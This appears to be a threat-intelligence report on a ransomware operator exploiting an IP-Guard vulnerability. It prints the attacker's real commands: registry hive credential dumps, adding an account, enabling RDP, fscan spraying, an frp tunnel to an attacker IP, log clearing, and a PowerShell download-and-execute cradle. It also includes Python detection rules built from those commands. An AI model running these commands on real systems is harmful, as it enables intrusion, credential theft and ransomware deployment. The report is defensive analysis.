Overview
QiAnXin Threat Intelligence Center has observed a diligent domestic ransomware operator that is mainly active on weekends, timing its work so that alerts raised during the intrusion go unwatched by security staff. On Saturdays the operator uses various N-day vulnerabilities to break in, performs continuous internal information gathering and assesses how many machines it controls; on Sunday evenings it deploys ransomware trojans in bulk, leaving a "surprise" for victims returning to work the next day. The tools mainly used for lateral movement are Cobalt Strike, fscan, frp and ransomware delivery packages, a toolset closely resembling the tactics domestic red teams use during penetration tests.
In the final part of the article, we will analyze the entire timeline of activities related to the IP-Guard vulnerability from the perspective of our own data, revealing the current intense state of attack and defense confrontation and presenting our views on vulnerability management in the field.
Review of Typical Penetration Attack Process
The attacker exploits the IP-Guard vulnerability to upload a webshell and then begins collecting information about the local machine. The following commands are executed through the webshell:
| Command |
|---|
| net user |
| tasklist |
| dir |
| save hklm\system system.zip |
| save hklm\SAM |
| net1 user audit Aa123456 /add |
| REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f |
The attacker first collects local machine information, dumps account password hashes, adds a user and attempts RDP remote login. They then drop a Cobalt Strike trojan named b.exe in the %UserProfile% directory which, when executed, injects shellcode into the lsass.exe process. Command and Control (C2): 38.46.8.218:55324. Using Cobalt Strike, the attacker then delivers the following files into the same directory. Some of these tools triggered antivirus alerts from Tianqing, prompting the attacker to quickly swap them for other, undetected tools so that the weekend's "work" could continue. The basic activity is as follows:
| Released File | Function |
|---|---|
| fscan64.exe | Scanner |
| adduser.exe | Adds user |
| f.exe | frp |
The attacker launches fscan to brute-force servers in the same C segment with the passwords captured from compromised servers, targeting RDP, SSH, SMB, MSSQL and other services.
| Command |
|---|
| fscan64.exe -silent -h 10.XX.X.X/16 -pa 3389 -o 16.txt -pwda XXXX |
| fscan64.exe -silent -h 10.XX.X.X/24 -m ssh -no -pwda XXXX |
| fscan64.exe -h 10.XX.X.X/24 -m mssql -pwd XXXXX -o mssql.txt -silent |
| fscan64 -h 10.XX.X.X/24 -m smb2 -hash XXXX7119 -username administrator |
The attacker starts frp to establish a reverse proxy.

| Command |
|---|
| f.exe -t 38.46.8.218 -p 7000 |
Finally, the attacker clears the system's PowerShell event log.

| Command |
|---|
| wevtutil cl "Windows PowerShell" |
After the brute-force run, the attacker found that the plaintext passwords and hashes they had obtained gave them logins to more than a dozen machines in the same C segment. Finally, on Sunday evening, they used Cobalt Strike to mass-deliver the ransomware payload windows_encryptor_471820908140_self_contained.exe. When executed, this self-contained file drops the LIVE ransomware encryptor, named systime.exe, into the %UserProfile% directory.
A reverse lookup of the Cobalt Strike C2 IP used in the attack led to the domain yangaoqing.com. The attacker appears to have changed the domain's resolved IP shortly before the intrusion.

| Timestamp | Associated IP |
|---|---|
| 2023-01-17~2023-10-09 | 39.97.108.148 (Beijing Alibaba Cloud) |
| 2023-10-09~2024-01-18 | 38.46.8.218 (United States) |
Unveiling the Covert Timeline of the IP-Guard Vulnerability from the Terminal Perspective
From the endpoint telemetry of QiAnXin Threat Intelligence, we observed large-scale probing of the IP-Guard vulnerability as early as September 2023, with several important government and enterprise entities breached. At that time the attackers only executed the whoami command, and our initial judgment was that security researchers had found a 0day and were testing it. Then, after a vulnerability advisory was released through a vendor's bug bounty program on November 8th (without a POC), on November 9th we observed black-market actors using the IP-Guard vulnerability in batch web attacks. The corresponding command line is as follows:
| Command |
|---|
| powershell -executionpolicybypass -noprofile -windowstylehidden (new-object system.net.webclient).downloadfile('http://154.12.57.238:7845/svdcx.exe','svdcx.exe');start-process svdcx.exe" |
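As an added defender-side example (not part of the QiAnXin report), the following Python applies process command-line rules derived from the commands in the penetration-process tables above (SAM/SYSTEM hive dump, account creation, RDP enable, fscan spraying, frp, PowerShell log clearing) and from the PowerShell download command in this section, then correlates hits per host, since the operator chains several of these steps on one machine. The telemetry is constructed for the demo and the host names are invented; only the IPs are taken from the report.

```python
import re
from collections import defaultdict

# Detection rules derived from the command lines reported in the article.
# Keyed by kill-chain stage; each value is a regex over the full command line.
RULES = {
    "credential_dump":    re.compile(r"\b(reg\s+)?save\s+hklm\\(sam|system)\b", re.I),
    "account_added":      re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "rdp_enabled":        re.compile(r"fDenyTSConnections\b.*\s/d\s+0+\b", re.I),
    "fscan_spray":        re.compile(r"\bfscan(64)?(\.exe)?\b.*\s-(pwda?|hash)\s", re.I),
    "frp_reverse_proxy":  re.compile(r"\bf(rpc)?(\.exe)?\s+-t\s+\d{1,3}(\.\d{1,3}){3}\s+-p\s+\d+", re.I),
    "ps_log_cleared":     re.compile(r'\bwevtutil\s+cl\s+"?windows powershell"?', re.I),
    "ps_download_cradle": re.compile(r"powershell.*downloadfile\(.*start-process", re.I),
}

def scan(events):
    """events: iterable of (host, cmdline) process-creation records.
    Returns (host, stage, cmdline) for every rule each record matches."""
    hits = []
    for host, cmdline in events:
        for stage, rx in RULES.items():
            if rx.search(cmdline):
                hits.append((host, stage, cmdline))
    return hits

def hosts_with_chain(hits, min_stages=3):
    """Escalate hosts showing at least min_stages distinct stages: one command
    may be an admin, but the article's operator chains several on one machine."""
    stages = defaultdict(set)
    for host, stage, _ in hits:
        stages[host].add(stage)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}

# Constructed sample telemetry (invented hosts; IPs are the article's IoCs).
SAMPLE_EVENTS = [
    ("SRV-WEB01", "net user"),
    ("SRV-WEB01", r"save hklm\SAM"),
    ("SRV-WEB01", "net1 user audit Aa123456 /add"),
    ("SRV-WEB01", r'REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'),
    ("SRV-WEB01", "fscan64.exe -silent -h 10.1.0.0/16 -pa 3389 -o 16.txt -pwda Aa123456"),
    ("SRV-WEB01", "f.exe -t 38.46.8.218 -p 7000"),
    ("SRV-WEB01", 'wevtutil cl "Windows PowerShell"'),
    ("WS-ACCT07", "powershell -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://154.12.57.238:7845/svdcx.exe','svdcx.exe');start-process svdcx.exe"),
    ("WS-ACCT07", "ipconfig /all"),
]

if __name__ == "__main__":
    print(*scan(SAMPLE_EVENTS), sep="\n")
    print(hosts_with_chain(scan(SAMPLE_EVENTS)))
```

Recon commands such as `net user` or `tasklist` are deliberately not rules here; they are too common to alert on alone, which is why the per-host correlation step exists.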
In this wave the attackers delivered domestically developed trojans such as Gh0st and Gray Pigeon, which are not suited to lateral movement, so the attacks did not cause direct, significant damage. They persisted until the end of November. Subsequently, China Telecom Security published its Mallox ransomware report [1], which noted exploitation of the IP-Guard vulnerability by ransomware groups on December 1st.
The above is not an isolated case. At our Threat Intelligence Center we have observed several web-layer vulnerabilities being exploited in the wild immediately after their security advisories were published. Such a short interval has only two plausible explanations: 1) black-market actors find and exploit the vulnerabilities themselves by quickly analyzing the patches, or 2) security researchers report undisclosed vulnerabilities through bug bounty programs and then immediately sell them to black-market actors. The latter cannot be ruled out. Preventing such incidents and fostering a healthy network environment is the duty and responsibility of every security vendor.
Conclusion
Currently, all products based on QiAnXin Threat Intelligence Center's threat intelligence data, including QiAnXin Threat Intelligence Platform (TIP), Tianqing, Advanced Threat Detection System, QiAnXin NGSOC, and QiAnXin Threat Perception, support precise detection of such attacks.
IOC
38.46.8.218:7000
38.46.8.218:55324
yangaoqing.com
Reference Links
[1] https://mp.weixin.qq.com/s/0b08HNOWW61DKGA0xwLxSw